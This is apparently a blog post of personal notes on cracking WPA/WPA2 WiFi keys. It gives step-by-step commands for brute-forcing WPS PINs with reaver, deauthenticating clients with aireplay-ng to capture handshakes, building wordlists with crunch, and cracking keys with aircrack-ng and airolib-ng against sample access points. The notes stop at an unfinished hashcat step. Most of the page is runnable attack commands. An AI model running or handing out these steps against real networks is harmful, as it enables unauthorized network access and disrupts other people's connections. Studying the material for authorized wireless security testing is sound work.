#WPA cracking method with WPS enabled
in WPA each packet is encrypted with a unique temporary key this means the number of data packets that we collect is irrelevant.
WPA2 and WPA are similar, the only difference is that WPA2 use an algorithm called CCMP.
WPS Feature
WPS is a feaure that allows users to connect to WPS enabled network easily, using WPS button or only by clicking on WPS functionality.
Authentication is done using an 8 digit long pin, this means that there is a relatively small number of pin combination and using
brute force we can guess the pin in less than 10 hours.
A tool called reaver can then recover the WPA/WPA2 key from the pin.
Note: This flaw is in the WPS feature and not in WPA/WPA2,however it allows us to crack any WPA/WPA2 AP without using a wordlist and without any client.
#cracking WPA/WPA2 with WPS feature
wash -i wlan1
#arguments of wash
Required Arguments:
-i, --interface= Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel= Channel to listen on [auto]
-o, --out-file= Write data to file
-n, --probes= Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-a, --all Show all APs, even those without WPS
-h, --help Show help
#use reaver to crack WPA with WPS enable
reaver -b [BSSID] -c [channel] -i [interface]
eg:
reaver -b EC:88:XX:XX:XX:XX -c 1 -i wlan1
reaver -i wlan1 -b 78:A1:XX:XX:XX:XX -c 1 -vv
#WPA/WPA2 cracking with WPS disabled
As explained before capturing WPA packets is not useful as they do not contain any info that can be used to crack the key.
The only packets that contain info that help us crack the password is the handshake packets.
Every time a client connects to the AP a four way hand shake occurs between the client and the AP.
By capturing the handshake,we can use aircrack to launch a word list attack against the handk shake to determine its key.
1. capture the handshake
2. A wordlist
#create a wordlist.
./crunch [min][max][characters=lower|upper|numbers|sumbols] -t[pattern] -o file
eg:
./crunch 6 8 123456!"&$% -o wordlist -t a@@@@b
crunch 8 8 aswrd0 -o wordlist -t P@@@@@@d
crunch 8 16 -f /path/to/charset.lst
crunch 8 16 -f /usr/share/rainbowcrack/charset.lst mixalpha-numeric -o mywordlist
#kill wpa_supplicant
airmon-ng check kill
#use aircrack-ng to crack the key, It does this by combining each password in the wordlist with AP name(essid)
#to compute a Pairwise Master Key(PMK) using the pbkdf2 algorithm, the PMK is then compared to the handshakd file.
aircrack-ng [HANDSHAKE FILE] -w [WORDLIST]
eg;
aircrack-ng is-01.cap -w wordlist
#start airodump-ng on the target AP
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX -w 18102he wlan1
#deauth a client to get handshake
aireplay-ng --deauth 4 -a 14:D6:XX:XX:XX:XX -c 1C:5C:XX:XX:XX:XX wlan1
#crack
aircrack-ng 18102-01.cap -w wordlist
#cracking the key using airolib-ng
1.create a database and import wordlist.
airolib-ng [db_name] --import passwd [dictionary]
eg:
airolib-ng is-db --import passwd list
airolib-ng 18102-db --import passwd wordlist
2. import target ESSID
airolib-ng is-db --import essid [essid-file]
eg:
airolib-ng is-db --import essid essid-name
echo "18102He" > 18102id
airolib-ng 18102-db --import essid 18102id
3. Compute PMK for the wordlist
airolib-ng [db-name] --batch
eg:
airolib-ng is-db --batch
airolib-ng 18102-db --batch
4. Crack the key using the PMK database
aircrack-ng -r [db-ame] [handshake_file]
aircrack-ng -r is-db is-01.cap
aircrack-ng -r 18102-db 18102he-01.cap
#speed up he cracking process using a tool called hashcat which use GPU instead of the CPU for the cracking process.
#convert hankshake file format to hccap .
阅读(1462) | 评论(0) | 转发(0) |